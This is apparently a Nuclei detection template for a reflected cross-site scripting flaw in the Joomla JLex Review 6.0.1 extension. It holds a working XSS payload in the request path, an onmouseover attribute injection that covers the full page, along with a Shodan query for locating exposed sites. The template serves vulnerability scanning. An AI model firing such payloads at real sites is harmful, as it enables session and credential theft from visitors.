id: joomla-jlex-xss

info:
  name: Joomla JLex Review 6.0.1 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
  reference:
    - https://www.exploitalert.com/view-details.html?id=39732
    - https://www.exploit-db.com/exploits/51645
    - https://extensions.joomla.org/extension/jlex-review/
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:-1950415971
  tags: joomla,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/?review_id=1&itwed%22onmouseover=%22confirm(document.domain)%22style=%22position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b%22b7yzn=1"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<a href="/?itwed"onmouseover="confirm(document.domain)"style='
          - 'jlex-review'
        condition: and

      - type: status
        status:
          - 200

# digest: 4a0a00473045022006681bc6f208118e423f7af492847c7f417ade552263ea5a922277cdf1cb7fee022100fc7b6b98c7c4e5601c84ef6080f799e1441cb939c00f963bdba4276a8d8fc6b2:922c64590222798bb761d5b6d8e72950